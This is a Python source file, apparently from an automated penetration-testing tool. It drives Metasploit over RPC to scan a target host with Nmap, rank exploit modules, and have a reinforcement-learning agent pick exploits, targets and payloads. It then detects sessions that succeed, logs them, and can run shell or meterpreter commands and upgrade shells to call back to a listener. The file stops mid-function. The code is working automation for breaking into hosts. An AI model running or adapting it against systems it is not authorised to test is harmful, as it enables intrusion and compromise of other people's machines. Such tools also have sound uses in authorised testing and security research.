#!/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import time
import datetime
import re
import json
import csv
import codecs
import random
import ipaddress
import configparser
import msgpack
import http.client
import threading
import numpy as np
from docopt import docopt
from keras.models import *
from keras.layers import *
from keras import backend as K
import tensorflow as tf

# Hide TensorFlow's acceleration warnings.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'

# Indices into the 7-element state list (s) that describes the target host
# (see ``Metasploit.state``).
ST_OS_TYPE = 0  # OS types (unix, linux, windows, osx..).
ST_PORT_NUM = 1  # Port number (21, 80, 445..).
ST_PROTOCOL = 2  # Protocol types (tcp, udp).
ST_SERV_NAME = 3  # Product name on Port.
ST_SERV_VER = 4  # Product version.
ST_PROMPT = 5  # Exploit module (stored as an index into the exploit list).
ST_TARGET = 6  # target types (0, 1, 2..).


# Metasploit interface.
class Msgrpc:
    """Thin client for Metasploit's MessagePack RPC (msgrpc) service.

    Each request is an HTTP(S) POST whose body is a msgpack-encoded list
    ``[method, token, *args]`` (``auth.login`` is sent without the token).
    The decoded response is handed back to the caller; this class indexes
    responses with *bytes* keys (``b'result'``, ``b'token'``, ...).
    """

    # RPC method that lists the modules of each supported module type.
    _MODULE_LIST_METHODS = {
        'exploit': 'module.exploits',
        'auxiliary': 'module.auxiliary',
        'post': 'module.post',
        'payload': 'module.payloads',
        'encoder': 'module.encoders',
        'nop': 'module.nops',
    }

    def __init__(self, option=None):
        """Create the (not yet connected) HTTP client.

        Args:
            option: Optional mapping with the keys ``host``, ``port``,
                ``uri`` and ``ssl``. Missing or falsy entries fall back to
                ``127.0.0.1``, ``55552``, ``/api/`` and ``False``.
        """
        # The old default was a list, which has no ``.get`` and made
        # ``Msgrpc()`` fail; treat any empty value as "no options".
        option = option or {}
        self.host = option.get('host') or "127.0.0.1"
        self.port = option.get('port') or 55552
        self.uri = option.get('uri') or "/api/"
        self.ssl = option.get('ssl') or False
        self.authenticated = False
        self.token = False
        self.headers = {"Content-type": "binary/message-pack"}
        if self.ssl:
            self.client = http.client.HTTPSConnection(self.host, self.port)
        else:
            self.client = http.client.HTTPConnection(self.host, self.port)

    @staticmethod
    def _decode_list(byte_list):
        """Decode every UTF-8 byte string in ``byte_list`` to ``str``."""
        return [item.decode('utf-8') for item in byte_list]

    # Call RPC API.
    def call(self, meth, option):
        """Send one RPC request and return the decoded response.

        Args:
            meth: RPC method name, e.g. ``'console.create'``.
            option: Sequence of positional arguments for the method. It is
                not modified.

        Returns:
            The msgpack-decoded response body.

        Exits the process with status 1 when any method other than
        ``auth.login`` is called before a successful login.
        """
        if meth != "auth.login":
            if not self.authenticated:
                print('[*] MsfRPC: Not Authenticated')
                sys.exit(1)
            request = [meth, self.token]
        else:
            request = [meth]
        # Build a new list so the caller's argument list is left untouched.
        request.extend(option)

        params = msgpack.packb(request)
        self.client.request("POST", self.uri, params, self.headers)
        resp = self.client.getresponse()
        # NOTE(review): this class reads responses with bytes keys. Newer
        # msgpack releases decode strings to ``str`` by default; confirm the
        # installed version (or pass ``raw=True``) before upgrading.
        return msgpack.unpackb(resp.read())

    # Log in to RPC Server.
    def login(self, user, password):
        """Authenticate and store the session token.

        Returns ``True`` on success; prints a message and exits with
        status 1 otherwise.
        """
        ret = self.call('auth.login', [user, password])
        if ret.get(b'result') == b'success':
            self.authenticated = True
            self.token = ret.get(b'token')
            return True
        print('[*] MsfRPC: Authentication failed')
        sys.exit(1)

    # Send Metasploit command.
    def send_command(self, console_id, command, visualization, sleep=0.1):
        """Write ``command`` to a console, wait ``sleep`` seconds, read back.

        When ``visualization`` is truthy the console output is printed;
        failures while printing are reported but do not abort the call.
        Returns the raw ``console.read`` response.
        """
        self.call('console.write', [console_id, command])
        time.sleep(sleep)
        ret = self.call('console.read', [console_id])
        if visualization:
            # Printing is best effort: the command has already been sent.
            try:
                print(ret.get(b'data').decode('utf-8'))
            except Exception as e:
                print("[*] type:{0}".format(type(e)))
                print("[*] args:{0}".format(e.args))
                print("[*] {0}".format(e))
                print('[*] Send_command is exception')
        return ret

    # Get all modules.
    def get_module_list(self, module_type):
        """Return the module names of ``module_type`` as a list of ``str``.

        ``module_type`` is one of ``exploit``, ``auxiliary``, ``post``,
        ``payload``, ``encoder`` or ``nop``. Any other value yields an empty
        list without contacting the server.
        """
        method = self._MODULE_LIST_METHODS.get(module_type)
        if method is None:
            return []
        ret = self.call(method, [])
        return self._decode_list(ret[b'modules'])

    # Get module detail information.
    def get_module_info(self, module_type, module_name):
        """Return the raw ``module.info`` response for a module."""
        return self.call('module.info', [module_type, module_name])

    # Get payload that compatible module.
    def get_compatible_payload_list(self, module_name):
        """Return the payload names compatible with ``module_name``."""
        ret = self.call('module.compatible_payloads', [module_name])
        return self._decode_list(ret[b'payloads'])

    # Get payload that compatible target.
    def get_target_compatible_payload_list(self, module_name, target_num):
        """Return the payload names compatible with one target of a module."""
        ret = self.call('module.target_compatible_payloads', [module_name, target_num])
        return self._decode_list(ret[b'payloads'])

    # Get module options.
    def get_module_options(self, module_type, module_name):
        """Return the raw ``module.options`` response for a module."""
        return self.call('module.options', [module_type, module_name])

    # Execute module.
    def execute_module(self, module_type, module_name, options):
        """Run a module and return ``(job_id, uuid)`` from the response."""
        ret = self.call('module.execute', [module_type, module_name, options])
        job_id = ret[b'job_id']
        uuid = ret[b'uuid'].decode('utf-8')
        return job_id, uuid

    # Get job list.
    def get_job_list(self):
        """Return the ids of the jobs reported by ``job.list`` as ints."""
        jobs = self.call('job.list', [])
        return [int(job_id.decode('utf-8')) for job_id in jobs]

    # Get job detail information.
    def get_job_info(self, job_id):
        """Return the raw ``job.info`` response for ``job_id``."""
        return self.call('job.info', [job_id])

    # Stop job.
    def stop_job(self, job_id):
        """Stop a job and return the raw ``job.stop`` response."""
        return self.call('job.stop', [job_id])

    # Get session list.
    def get_session_list(self):
        """Return the raw ``session.list`` response."""
        return self.call('session.list', [])

    # Stop session.
    def stop_session(self, session_id):
        """Stop the session with the given id."""
        self.call('session.stop', [str(session_id)])

    # Stop meterpreter session.
    def stop_meterpreter_session(self, session_id):
        """Detach the meterpreter session with the given id."""
        self.call('session.meterpreter_session_detach', [str(session_id)])

    # Execute shell.
    def execute_shell(self, session_id, cmd):
        """Write ``cmd`` to a shell session; return the decoded write count."""
        ret = self.call('session.shell_write', [str(session_id), cmd])
        return ret[b'write_count'].decode('utf-8')

    # Get executing shell result.
    def get_shell_result(self, session_id, read_pointer):
        """Read shell output; return the decoded ``(seq, data)`` pair."""
        ret = self.call('session.shell_read', [str(session_id), read_pointer])
        seq = ret[b'seq'].decode('utf-8')
        data = ret[b'data'].decode('utf-8')
        return seq, data

    # Execute meterpreter.
    def execute_meterpreter(self, session_id, cmd):
        """Write ``cmd`` to a meterpreter session; return the decoded result."""
        ret = self.call('session.meterpreter_write', [str(session_id), cmd])
        return ret[b'result'].decode('utf-8')

    # Execute single meterpreter.
    def execute_meterpreter_run_single(self, session_id, cmd):
        """Run a single meterpreter command; return the decoded result."""
        ret = self.call('session.meterpreter_run_single', [str(session_id), cmd])
        return ret[b'result'].decode('utf-8')

    # Get executing meterpreter result.
    def get_meterpreter_result(self, session_id):
        """Read and decode pending meterpreter output."""
        ret = self.call('session.meterpreter_read', [str(session_id)])
        return ret[b'data'].decode('utf-8')

    # Upgrade shell session to meterpreter.
    def upgrade_shell_session(self, session_id, lhost, lport):
        """Request a shell-to-meterpreter upgrade; return the decoded result."""
        ret = self.call('session.shell_upgrade', [str(session_id), lhost, lport])
        return ret[b'result'].decode('utf-8')

    # Log out from RPC Server.
    def logout(self):
        """Invalidate the current token.

        Returns ``True`` on success; prints a message and exits with
        status 1 otherwise.
        """
        # ``call`` prepends the token itself, so the token is sent twice:
        # once to authenticate the request and once as the method argument.
        ret = self.call('auth.logout', [self.token])
        if ret.get(b'result') == b'success':
            self.authenticated = False
            self.token = ''
            return True
        print('[*] MsfRPC: Logout failed')
        sys.exit(1)

    # Disconnection.
    def termination(self, console_id):
        """Kill the session of ``console_id`` and log out of the server."""
        # Kill a console.
        self.call('console.session_kill', [console_id])
        # Log out
        self.logout()


# Metasploit's environment.
class Metasploit:
    def __init__(self, target_ip='127.0.0.1'):
        """Load ``config.ini``, log in to the RPC server and open a console.

        Args:
            target_ip: Address of the host to attack; stored as ``rhost``.

        ``config.ini`` is read from the directory containing this file. The
        process exits with status 1 when the file cannot be read or parsed.
        """
        self.rhost = target_ip
        # Read config.ini.
        full_path = os.path.dirname(os.path.abspath(__file__))
        config_file = os.path.join(full_path, 'config.ini')
        config = configparser.ConfigParser()
        try:
            loaded = config.read(config_file)
        except configparser.Error as err:
            print('[*] Config parse error: {0}'.format(err))
            sys.exit(1)
        # ``read`` skips files it cannot open instead of raising, so an empty
        # result is the only sign that config.ini is missing or unreadable.
        if not loaded:
            print('[*] Config file not found: {0}'.format(config_file))
            sys.exit(1)
        # Common setting value.
        server_host = config['Common']['server_host']
        server_port = int(config['Common']['server_port'])
        msgrpc_user = config['Common']['msgrpc_user']
        msgrpc_pass = config['Common']['msgrpc_pass']
        self.timeout = int(config['Common']['timeout'])
        self.max_attempt = int(config['Common']['max_attempt'])
        self.save_path = os.path.join(full_path, config['Common']['save_path'])
        self.save_file = os.path.join(self.save_path, config['Common']['save_file'])
        self.data_path = os.path.join(full_path, config['Common']['data_path'])

        # Metasploit options setting value.
        self.lhost = config['Metasploit']['lhost']
        self.lport = config['Metasploit']['lport']

        # Nmap options setting value.
        self.nmap_option = config['Nmap']['option']
        # Kept as the raw config string (unlike ``timeout`` above).
        self.nmap_timeout = config['Nmap']['timeout']

        # A3C setting value.
        self.train_worker_num = int(config['A3C']['train_worker_num'])
        self.train_max_num = int(config['A3C']['train_max_num'])
        self.train_max_steps = int(config['A3C']['train_max_steps'])
        self.train_tmax = int(config['A3C']['train_tmax'])
        self.test_worker_num = int(config['A3C']['test_worker_num'])

        # State setting value. The lists are '@'-separated in the config.
        self.state = [0, 0, 0, 0, 0, 0, 0]  # Deep Exploit's state(s).
        self.os_type = str(config['State']['os_type']).split('@')  # OS type.
        self.service_list = str(config['State']['services']).split('@')  # Product name.
        self.protocol_list = str(config['State']['protocols']).split('@')  # Protocol type.

        # Report setting value.
        self.report_path = os.path.join(full_path, config['Report']['report_path'])

        self.client = Msgrpc({'host': server_host, 'port': server_port})  # Create Msgrpc instance.
        self.client.login(msgrpc_user, msgrpc_pass)  # Log in to RPC Server.
        self.console_id = self.get_console()  # Get MSFconsole ID.

        # Set OS type to state.
        self.target_os = self.set_state_os()

    # Parse.
    def cutting_strings(self, pattern, target):
        """Return every match of the regex ``pattern`` found in ``target``."""
        matcher = re.compile(pattern)
        return matcher.findall(target)

    # Normalization.
    def normalization(self, target_idx):
        """Rescale one entry of ``self.state`` in place around zero.

        The entry is replaced by ``(value - half) / half`` where ``half`` is
        half of the entry's range: 65535 for the port number, or the length
        of the protocol, service or exploit list. Any other index is left
        untouched.
        """
        if target_idx == ST_PORT_NUM:
            slot = ST_PORT_NUM
            value = int(self.state[ST_PORT_NUM])
            half = 65535 / 2
        elif target_idx == ST_PROTOCOL:
            slot = ST_PROTOCOL
            value = self.state[ST_PROTOCOL]
            half = len(self.protocol_list) / 2
        elif target_idx == ST_SERV_NAME:
            slot = ST_SERV_NAME
            value = self.state[ST_SERV_NAME]
            half = len(self.service_list) / 2
        elif target_idx == ST_PROMPT:
            slot = ST_PROMPT
            value = self.state[ST_PROMPT]
            half = len(com_exploit_list) / 2
        else:
            return
        self.state[slot] = (value - half) / half

    # Create MSFconsole.
    def get_console(self):
        """Create a new MSF console over RPC and return its id."""
        created = self.client.call('console.create', [])
        new_id = created.get(b'id')
        # Read once right after creation; the response is discarded.
        self.client.call('console.read', [new_id])
        return new_id

    # Set OS type to state.
    def set_state_os(self):
        """Look up the target's OS in the Metasploit host table.

        Repeats the ``hosts`` console command until its output contains
        ``'Hosts'`` or ``self.timeout`` attempts have been made (the RPC
        session is terminated in that case). ``self.state[ST_OS_TYPE]`` is
        set to the index of the first ``self.os_type`` entry containing the
        detected name, or to the last index when nothing matches.

        Returns:
            The lower-cased OS name, or ``'unknown'`` when none was found.
        """
        os_raw = ''
        time_count = 0
        hosts_cmd = 'hosts -c address,os_name -R ' + self.rhost + '\n'
        while True:
            ret = self.client.send_command(self.console_id, hosts_cmd, False)
            os_raw = ret.get(b'data').decode('utf-8')
            if 'Hosts' in os_raw:
                break
            if self.timeout == time_count:
                self.client.termination(self.console_id)
                print('[*] Timeout: "{0}"'.format(hosts_cmd))
                break
            time_count += 1

        # Escape the address so its dots only match literal dots.
        matches = self.cutting_strings(re.escape(self.rhost) + r'  (.*)', os_raw)
        # Taking ``[0]`` of the fallback string used to yield 'u', and an empty
        # capture matched every entry; both now map to 'unknown'.
        os_name = matches[0].strip().lower() if matches else ''
        if not os_name:
            os_name = 'unknown'

        # Default to the last OS type unless a configured entry matches.
        self.state[ST_OS_TYPE] = len(self.os_type) - 1
        for (idx, os_type) in enumerate(self.os_type):
            if os_name in os_type:
                self.state[ST_OS_TYPE] = idx
                break
        return os_name

    # Get current time.
    def get_current_time(self):
        now = datetime.datetime.now()
        now_time = datetime.datetime(now.year, now.month, now.day, now.hour, now.minute, now.second)
        return now_time

    # Execute Nmap.
    def execute_nmap(self):
        """Scan the target with ``db_nmap`` unless a saved result exists.

        The scan is skipped when ``target_info_<rhost>.json`` is present in
        ``self.data_path``. Otherwise the command is written to the console
        and polled once per second until the console is no longer busy or
        the configured Nmap timeout (in polls) is reached. Afterwards the
        console is destroyed and replaced by a fresh one.
        """
        print('[+] Execute Nmap.')
        saved_file = os.path.join(self.data_path, 'target_info_' + self.rhost + '.json')
        if os.path.exists(saved_file):
            print('[*] Nmap already scanned.')
            return

        print('[*] Executing...')
        print('[*] Start time: {0}'.format(self.get_current_time()))

        # Execute Nmap.
        nmap_cmd = 'db_nmap ' + self.nmap_option + ' ' + self.rhost + '\n'
        _ = self.client.call('console.write', [self.console_id, nmap_cmd])
        time.sleep(3.0)
        # The timeout is stored as a config string; comparing it to the int
        # counter without converting never matched, so the loop could hang.
        nmap_timeout = int(self.nmap_timeout)
        time_count = 0
        while True:
            # Judgement of Nmap finishing.
            ret = self.client.call('console.read', [self.console_id])
            if ret.get(b'busy') is False:
                print('[*] End time  : {0}'.format(self.get_current_time()))
                break
            if time_count >= nmap_timeout:
                self.client.termination(self.console_id)
                print('[*] Timeout   : {0}'.format(nmap_cmd))
                print('[*] End time  : {0}'.format(self.get_current_time()))
                break
            time.sleep(1.0)
            time_count += 1

        # Replace the console used for the scan with a fresh one.
        _ = self.client.call('console.destroy', [self.console_id])
        self.console_id = self.get_console()

    # Get port list from Nmap's result.
    def get_port_list(self):
        """Return the target's open ports with their protocol and info.

        When ``target_info_<rhost>.json`` exists in ``self.data_path`` the
        port numbers are taken from its keys (the first key is skipped) and
        the protocol and info lists stay empty. Otherwise the ``services``
        console command is run and its output parsed. The process exits
        with status 1 when no open port is found.

        Returns:
            A ``(port_list, proto_list, info_list)`` tuple of string lists.
        """
        print('[+] Get port list.')
        port_list = []
        proto_list = []
        info_list = []
        saved_file = os.path.join(self.data_path, 'target_info_' + self.rhost + '.json')
        if not os.path.exists(saved_file):
            nmap_result = ''
            services_cmd = 'services -c port,proto,info -R ' + self.rhost + '\n'
            _ = self.client.call('console.write', [self.console_id, services_cmd])
            time.sleep(3.0)
            # The timeout is stored as a config string; convert it so the
            # comparison with the int counter can actually succeed.
            nmap_timeout = int(self.nmap_timeout)
            time_count = 0
            while True:
                # Judgement of 'services' command finishing.
                ret = self.client.call('console.read', [self.console_id])
                nmap_result += ret.get(b'data').decode('utf-8')
                if ret.get(b'busy') is False:
                    break
                if time_count >= nmap_timeout:
                    self.client.termination(self.console_id)
                    print('[*] Timeout: "{0}"'.format(services_cmd))
                    break
                time.sleep(1.0)
                time_count += 1

            # Escape the address so its dots only match literal dots.
            host = re.escape(self.rhost)
            port_list = self.cutting_strings(host + r'  ([0-9]{1,5})', nmap_result)
            proto_list = self.cutting_strings(host + r'  [0-9]{1,5} .*(tcp|udp) ', nmap_result)
            # ``(?:tcp|udp)`` is an alternation; the former ``[tcp|udp]`` was a
            # character class matching any single one of those letters.
            info_list = self.cutting_strings(host + r'  [0-9]{1,5} .*(?:tcp|udp)    (.*)', nmap_result)
            if len(port_list) == 0:
                print('[*] No open port.')
                print('[*] Shutdown Deep Exploit...')
                self.client.termination(self.console_id)
                sys.exit(1)
        else:
            # Get target host information from local file.
            print('[*] Loading target tree from local file: {0}'.format(saved_file))
            with codecs.open(saved_file, 'r', 'utf-8') as fin:
                target_tree = json.load(fin)
            # The first key is skipped; the remaining keys are port numbers.
            port_list.extend(list(target_tree.keys())[1:])

        return port_list, proto_list, info_list

    # Get Exploit module list.
    def get_exploit_list(self):
        """Return the names of the exploit modules to consider.

        The list is read from ``exploit_list.csv`` in ``self.data_path`` when
        that file exists (one name per line). Otherwise every exploit module
        is queried over RPC, those ranked ``excellent``, ``great`` or
        ``good`` are kept, and the result is saved to that file.
        """
        print('[+] Get exploit list.')
        local_file = os.path.join(self.data_path, 'exploit_list.csv')
        if os.path.exists(local_file):
            # Get exploit module list from local file.
            print('[*] Loading exploit list from local file: ' + local_file)
            with codecs.open(local_file, 'r', 'utf-8') as fin:
                return [item.rstrip('\n') for item in fin]

        print('[*] Loading exploit list from Metasploit.')

        # Get Exploit module list, keeping only the better-ranked modules.
        accepted_ranks = {'excellent', 'great', 'good'}
        all_exploit_list = []
        for exploit in self.client.get_module_list('exploit'):
            module_info = self.client.get_module_info('exploit', exploit)
            if module_info[b'rank'].decode('utf-8') in accepted_ranks:
                all_exploit_list.append(exploit)

        # Save Exploit module list to local file.
        print('[*] Loaded exploit num: ' + str(len(all_exploit_list)))
        # ``with`` closes the file even if a write fails.
        with codecs.open(local_file, 'w', 'utf-8') as fout:
            for item in all_exploit_list:
                fout.write(item + '\n')
        print('[*] Saved exploit list.')
        return all_exploit_list

    # Get payload list.
    def get_payload_list(self, module_name='', target_num=''):
        """Return payload names, optionally restricted to a module or target.

        Args:
            module_name: Exploit module to restrict the payloads to. When
                empty, all payloads are returned, using ``payload_list.csv``
                in ``self.data_path`` as a cache (read if present, written
                otherwise).
            target_num: Target of ``module_name`` to restrict the payloads
                to. Ignored when ``module_name`` is empty.

        Returns:
            A list of payload names.
        """
        print('[+] Get payload list.')
        local_file = os.path.join(self.data_path, 'payload_list.csv')
        if module_name == '' and os.path.exists(local_file):
            # Get payload list from local file.
            print('[*] Loading payload list from local file: ' + local_file)
            with codecs.open(local_file, 'r', 'utf-8') as fin:
                return [item.rstrip('\n') for item in fin]

        print('[*] Loading payload list from Metasploit.')
        if module_name == '':
            # Get all Payloads.
            payload_list = self.client.get_module_list('payload')

            # Save payload list to local file; ``with`` closes the file even
            # if a write fails.
            with codecs.open(local_file, 'w', 'utf-8') as fout:
                for item in payload_list:
                    fout.write(item + '\n')
            print('[*] Saved payload list.')
        elif target_num == '':
            # Get payload that compatible exploit module.
            payload_list = self.client.get_compatible_payload_list(module_name)
        else:
            # Get payload that compatible target.
            payload_list = self.client.get_target_compatible_payload_list(module_name, target_num)
        return payload_list

    # Reset state (s).
    def reset_state(self, exploit_tree, target_tree):
        """Pick a random port, exploit and target and load them into the state.

        Returns:
            ``(True, None, None, None, None)`` when the product on the chosen
            port is ``'unknown'``. Otherwise ``(False, state, target_detail,
            target_list, target_info)``, where ``state`` is ``self.state``
            itself, ``target_detail`` is the chosen module's ``'targets'``
            entry for the picked target, and ``target_info`` is a dict for
            display.
        """
        # Randomly select target port number.
        port_num = com_port_list[random.randrange(len(com_port_list))]
        product = target_tree[port_num]['prod_name']
        if product == 'unknown':
            return True, None, None, None, None

        # Set port number to state.
        shown_port = target_tree['origin_port'] if com_indicate_flag else port_num
        self.state[ST_PORT_NUM] = int(shown_port)
        self.normalization(ST_PORT_NUM)

        # Set product name (index) to state; unchanged when not listed.
        for position, candidate in enumerate(self.service_list):
            if candidate == product:
                self.state[ST_SERV_NAME] = position
                break
        self.normalization(ST_SERV_NAME)

        # Set version to state.
        self.state[ST_SERV_VER] = target_tree[port_num]['version']

        # Set protocol type (index) to state; unchanged when not listed.
        for position, candidate in enumerate(self.protocol_list):
            if candidate == target_tree[port_num]['protocol']:
                self.state[ST_PROTOCOL] = position
                break
        self.normalization(ST_PROTOCOL)

        # Randomly select exploit module and store its index in the state.
        candidates = target_tree[port_num]['exploit']
        full_name = candidates[random.randrange(len(candidates))]
        for position, short_name in enumerate(com_exploit_list):
            if 'exploit/' + short_name == full_name:
                self.state[ST_PROMPT] = position
                break
        self.normalization(ST_PROMPT)

        # Randomly select target. The first 8 characters ('exploit/') are
        # dropped to get the key used by ``exploit_tree``.
        module_name = full_name[8:]
        target_list = exploit_tree[module_name]['target_list']
        targets_num = target_list[random.randrange(len(target_list))]
        self.state[ST_TARGET] = int(targets_num)

        # Set target information for display.
        target_info = {
            'protocol': target_tree[port_num]['protocol'],
            'prod_name': product,
            'version': target_tree[port_num]['version'],
            'exploit': module_name,
        }
        if com_indicate_flag:
            port_num = target_tree['origin_port']
        target_info['port'] = str(port_num)

        target_detail = exploit_tree[module_name]['targets'][targets_num]
        return False, self.state, target_detail, target_list, target_info

    # Get state (s).
    def get_state(self, exploit_tree, target_tree, port_num, exploit, target):
        """Load the given port, exploit and target into the state.

        Args:
            exploit_tree: Mapping of module name to module details.
            target_tree: Mapping of port number to service details.
            port_num: Key of the port in ``target_tree``.
            exploit: Module name including its ``'exploit/'`` prefix.
            target: Target key of the module.

        Returns:
            ``(True, None, None, None)`` when the product on the port is
            ``'unknown'``. Otherwise ``(False, state, target_detail,
            target_info)``, where ``state`` is ``self.state`` itself.
        """
        # Get product name.
        product = target_tree[port_num]['prod_name']
        if product == 'unknown':
            return True, None, None, None

        # Set port number to state.
        shown_port = target_tree['origin_port'] if com_indicate_flag else port_num
        self.state[ST_PORT_NUM] = int(shown_port)
        self.normalization(ST_PORT_NUM)

        # Set product name (index) to state; unchanged when not listed.
        for position, candidate in enumerate(self.service_list):
            if candidate == product:
                self.state[ST_SERV_NAME] = position
                break
        self.normalization(ST_SERV_NAME)

        # Set version to state.
        self.state[ST_SERV_VER] = target_tree[port_num]['version']

        # Set protocol type (index) to state; unchanged when not listed.
        for position, candidate in enumerate(self.protocol_list):
            if candidate == target_tree[port_num]['protocol']:
                self.state[ST_PROTOCOL] = position
                break
        self.normalization(ST_PROTOCOL)

        # Select exploit module (index).
        for position, short_name in enumerate(com_exploit_list):
            if exploit == 'exploit/' + short_name:
                self.state[ST_PROMPT] = position
                break
        self.normalization(ST_PROMPT)

        # Select target.
        self.state[ST_TARGET] = int(target)

        # Set target information for display. The first 8 characters
        # ('exploit/') are dropped from the module name.
        target_info = {
            'protocol': target_tree[port_num]['protocol'],
            'prod_name': product,
            'version': target_tree[port_num]['version'],
            'exploit': exploit[8:],
            'target': target,
        }
        if com_indicate_flag:
            port_num = target_tree['origin_port']
        target_info['port'] = str(port_num)

        target_detail = exploit_tree[exploit[8:]]['targets'][target]
        return False, self.state, target_detail, target_info

    # Get available payload list.
    def get_available_actions(self, payload_list):
        """Map payload names to their indices in ``com_payload_list``.

        Each name in ``payload_list`` contributes the index of its first
        occurrence in ``com_payload_list``; names not present there are
        skipped. The order of ``payload_list`` is kept.
        """
        indices = []
        for wanted in payload_list:
            position = next(
                (idx for idx, known in enumerate(com_payload_list) if known == wanted),
                None,
            )
            if position is not None:
                indices.append(position)
        return indices

    # Show banner of successfully exploitation.
    def show_banner_bingo(self, prod_name, version, exploit, payload, sess_type, delay_time=2.0):
        """Print the success banner with the exploit details, then pause.

        The banner is followed by one line of the form
        ``<prod_name>/<version> <exploit> <payload> <sess_type>``; the call
        then sleeps for ``delay_time`` seconds.
        """
        art = """
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
　　　    ██████╗ ██╗███╗   ██╗ ██████╗  ██████╗ ██╗██╗██╗
          ██╔══██╗██║████╗  ██║██╔════╝ ██╔═══██╗██║██║██║
          ██████╔╝██║██╔██╗ ██║██║  ███╗██║   ██║██║██║██║
          ██╔══██╗██║██║╚██╗██║██║   ██║██║   ██║╚═╝╚═╝╚═╝
          ██████╔╝██║██║ ╚████║╚██████╔╝╚██████╔╝██╗██╗██╗
          ╚═════╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═╝╚═╝╚═╝
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        """
        product = '/'.join((prod_name, version))
        details = ' '.join((product, exploit, payload, sess_type))
        print(art + details + '\n')
        time.sleep(delay_time)

    # Set Metasploit options.
    def set_options(self, target_info, selected_payload, exploit_tree):
        """Build the option dict passed to Metasploit for one exploit run.

        Every required option of the module named by
        ``target_info['exploit']`` is filled in: with its ``user_specify``
        value when that is non-empty, else its ``default``, or ``'0'`` when
        the option has no default. ``RHOST`` and ``RPORT`` are then set from
        ``self.rhost`` and ``target_info['port']``, and ``PAYLOAD`` is added
        unless ``selected_payload`` is empty.
        """
        module_options = exploit_tree[target_info['exploit']]['options']
        option = {}
        for name, spec in module_options.items():
            if spec['required'] is not True:
                continue
            if 'default' not in spec:
                option[name] = '0'
                continue
            # If "user_specify" is not null, it overrides the default.
            user_value = spec['user_specify']
            option[name] = spec['default'] if user_value == '' else user_value
        option.update({'RHOST': self.rhost, 'RPORT': int(target_info['port'])})
        if selected_payload != '':
            option['PAYLOAD'] = selected_payload
        return option

    # Execute exploit.
    def execute_exploit(self, action, thread_name, thread_type, target_list, target_info, step, exploit_tree, frame=0):
        """Run one exploit attempt and report the outcome.

        Args:
            action: Index into ``com_payload_list`` of the payload to use, or
                the string ``'no payload'``.
            thread_name: Name used in the console output and as the base name
                of the CSV report file.
            thread_type: ``'learning'`` or anything else (testing).
            target_list: In learning mode, the list of selectable targets; in
                testing mode, the target number itself.
            target_info: Dict with the keys ``exploit``, ``protocol``,
                ``port``, ``prod_name`` and ``version``.
            step: Current step, checked against ``self.max_attempt`` in
                testing mode.
            exploit_tree: Mapping of module name to module details, used to
                build the module options.
            frame: Counter shown in the console output.

        Returns:
            ``(state, reward, done, session_list)``. ``reward`` is 1 when a
            session created by this attempt is found and -1 otherwise;
            ``session_list`` is only filled in testing mode on success. In
            testing mode, once ``step`` exceeds ``self.max_attempt - 1`` the
            result is ``(state, None, True, {})`` without running anything.
        """
        # Set target.
        target = ''
        if thread_type == 'learning':
            target = str(self.state[ST_TARGET])
        else:
            # If testing, 'target_list' is target number (not list).
            target = target_list
            # If trial exceed maximum number of trials, finish trial at current episode.
            if step > self.max_attempt - 1:
                return self.state, None, True, {}

        # Set payload.
        selected_payload = ''
        if action != 'no payload':
            selected_payload = com_payload_list[action]
        else:
            # No payload
            selected_payload = ''

        # Set options.
        option = self.set_options(target_info, selected_payload, exploit_tree)

        # Execute exploit.
        reward = 0
        message = ''
        session_list = {}
        done = False
        job_id, uuid = self.client.execute_module('exploit', target_info['exploit'], option)
        # NOTE(review): Msgrpc.execute_module returns ``uuid`` from a
        # ``.decode()`` call, so the 'time out' branch below looks
        # unreachable as written - confirm.
        if uuid is not None:
            # Waiting job to finish: poll the job list once per second until
            # the job disappears or ``self.timeout`` polls have been made.
            time_count = 0
            while True:
                job_id_list = self.client.get_job_list()
                if job_id in job_id_list:
                    time.sleep(1)
                else:
                    break
                if self.timeout == time_count:
                    self.client.stop_job(str(job_id))
                    break
                time_count += 1
            sessions = self.client.get_session_list()
            key_list = sessions.keys()
            if len(key_list) != 0:
                # Probably successfully of exploitation (but unsettled).
                # Only a session whose exploit uuid matches this run counts.
                for key in key_list:
                    exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8')
                    if uuid == exploit_uuid:
                        # Successfully of exploitation.
                        reward = 1
                        done = True
                        session_id = int(key)
                        session_type = sessions[key][b'type'].decode('utf-8')
                        session_port = str(sessions[key][b'session_port'])
                        session_exploit = sessions[key][b'via_exploit'].decode('utf-8')
                        session_payload = sessions[key][b'via_payload'].decode('utf-8')
                        message = 'bingo!! '

                        # Gather reporting items.
                        module_info = self.client.get_module_info('exploit', session_exploit)
                        vuln_name = module_info[b'name'].decode('utf-8')
                        description = module_info[b'description'].decode('utf-8')
                        ref_list = module_info[b'references']
                        # References are flattened to '[a]@b@@' segments.
                        reference = ''
                        for item in ref_list:
                            reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@'
                        # Append one row per success to '<thread_name>.csv'.
                        with codecs.open(os.path.join(self.report_path, thread_name + '.csv'), 'a', 'utf-8') as fout:
                            bingo = [self.rhost,
                                     session_port,
                                     target_info['protocol'],
                                     target_info['prod_name'],
                                     str(target_info['version']),
                                     vuln_name,
                                     description,
                                     session_type,
                                     session_exploit,
                                     target,
                                     session_payload,
                                     reference]
                            writer = csv.writer(fout)
                            writer.writerow(bingo)

                        # Display banner.
                        self.show_banner_bingo(target_info['prod_name'],
                                               str(target_info['version']),
                                               session_exploit,
                                               session_payload,
                                               session_type)

                        # Disconnect session.
                        if thread_type == 'learning':
                            self.client.stop_session(key)
                            self.client.stop_meterpreter_session(key)
                        # Create session list for post-exploitation.
                        else:
                            session_list['id'] = session_id
                            session_list['type'] = session_type
                            session_list['port'] = session_port
                            session_list['exploit'] = session_exploit
                            session_list['target'] = target
                            session_list['payload'] = session_payload
                        break
                else:
                    # Failure exploitation: the loop ended without ``break``,
                    # i.e. no session matched this run's uuid.
                    reward = -1
                    message = 'failure '
            else:
                # Failure exploitation.
                reward = -1
                message = 'failure '
        else:
            # Time out or internal error of Metasploit.
            done = True
            reward = 0
            message = 'time out'

        # Output result to console.
